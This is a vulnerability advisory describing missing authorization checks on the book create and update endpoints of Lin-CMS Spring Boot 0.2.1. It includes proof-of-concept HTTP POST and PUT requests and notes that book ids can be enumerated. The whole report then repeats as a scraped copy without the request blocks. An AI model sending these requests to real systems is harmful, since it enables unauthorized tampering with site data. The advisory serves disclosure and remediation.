Vulnerability Introduction
An unauthorized access vulnerability exists in version 0.2.1 of Lin-CMS Spring Boot. This vulnerability allows remote attackers to create arbitrary books without authorization by exploiting the book creation method within the BookController.java component, and to update the information of any existing book without authorization by exploiting the book update method.
Vulnerability Analysis
Unauthorized Arbitrary Book Creation Vulnerability
Vulnerable Class File: src/main/java/io/github/talelin/latticy/controller/v1/BookController.java
Line 63 of the file uses a POST request method to access the route /v1/book. Without any permission verification, the createBook() method is triggered, directly calling the database to create a book.
Unauthorized Arbitrary Book Information Update Vulnerability
Vulnerable Class File: src/main/java/io/github/talelin/latticy/controller/v1/BookController.java
At line 70 of the file, a PUT request is utilized to access the route /v1/book/{id}. Notably, this endpoint lacks any form of access control or permission validation. Consequently, it triggers the updateBook method—which checks for the existence of a book corresponding to the provided id and, if found, directly updates its information—without any authorization checks. Furthermore, the id parameter follows a predictable, enumerable pattern. As a result, an attacker can iterate through the id values to target every single book currently stored in the database, thereby modifying the information associated with each one.
Vulnerability Reproduction
Unauthorized Arbitrary Book Creation Vulnerability
As you can see, there are currently no books in the book database table with the title "TEST".
POC for Sending a Request Without Any Permissions:
POST /v1/book HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 91
{
"title": "TEST",
"author": "TEST",
"summary": "TEST",
"image": "TEST.jsp"
}
response:
In the database, it can be observed that the unauthorized addition of the "TEST book" was successful.
Unauthorized Arbitrary Book Information Update Vulnerability
Retrieve information for all books currently present in the database via GET /v1/book. The request is as follows:
GET /v1/book HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 0
response:
Upon discovering the existence of books with IDs ranging from 1 to 6, a simulated attack is performed against the book with ID 6. This is executed via a PUT request to the /v1/book/6 route to update the book's information. The Proof of Concept (POC) is as follows:
PUT /v1/book/6 HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 129
{
"title": "Hacker",
"author": "Hacker",
"summary": "Hacker",
"image": "Hacker.jsp"
}The response is as follows:
Upon querying via GET /v1/book, it was discovered that the information for the book with id=6 has been modified—specifically, it changed from "TEST" to "Hacker".
In the database, the information for the book with ID=6 has also been updated.
Vulnerability Remediation Recommendations
Add permission annotations to the createBook and updateBook methods
Vulnerability Introduction
An unauthorized access vulnerability exists in version 0.2.1 of Lin-CMS Spring Boot. This vulnerability allows remote attackers to create arbitrary books without authorization by exploiting the book creation method within the
BookController.javacomponent, and to update the information of any existing book without authorization by exploiting the book update method.Vulnerability Analysis
Unauthorized Arbitrary Book Creation Vulnerability
Vulnerable Class File: src/main/java/io/github/talelin/latticy/controller/v1/BookController.java
Line 63 of the file uses a POST request method to access the route /v1/book. Without any permission verification, the createBook() method is triggered, directly calling the database to create a book.
Unauthorized Arbitrary Book Information Update Vulnerability
Vulnerable Class File: src/main/java/io/github/talelin/latticy/controller/v1/BookController.java
At line 70 of the file, a PUT request is utilized to access the route
/v1/book/{id}. Notably, this endpoint lacks any form of access control or permission validation. Consequently, it triggers theupdateBookmethod—which checks for the existence of a book corresponding to the providedidand, if found, directly updates its information—without any authorization checks. Furthermore, theidparameter follows a predictable, enumerable pattern. As a result, an attacker can iterate through theidvalues to target every single book currently stored in the database, thereby modifying the information associated with each one.Vulnerability Reproduction
Unauthorized Arbitrary Book Creation Vulnerability
As you can see, there are currently no books in the
bookdatabase table with the title "TEST".POC for Sending a Request Without Any Permissions:
response:
In the database, it can be observed that the unauthorized addition of the "TEST book" was successful.
Unauthorized Arbitrary Book Information Update Vulnerability
Retrieve information for all books currently present in the database via
GET /v1/book. The request is as follows:response:
Upon discovering the existence of books with IDs ranging from 1 to 6, a simulated attack is performed against the book with ID 6. This is executed via a PUT request to the
/v1/book/6route to update the book's information. The Proof of Concept (POC) is as follows:The response is as follows:
Upon querying via
GET /v1/book, it was discovered that the information for the book withid=6has been modified—specifically, it changed from "TEST" to "Hacker".In the database, the information for the book with ID=6 has also been updated.
Vulnerability Remediation Recommendations
Add permission annotations to the
createBookandupdateBookmethods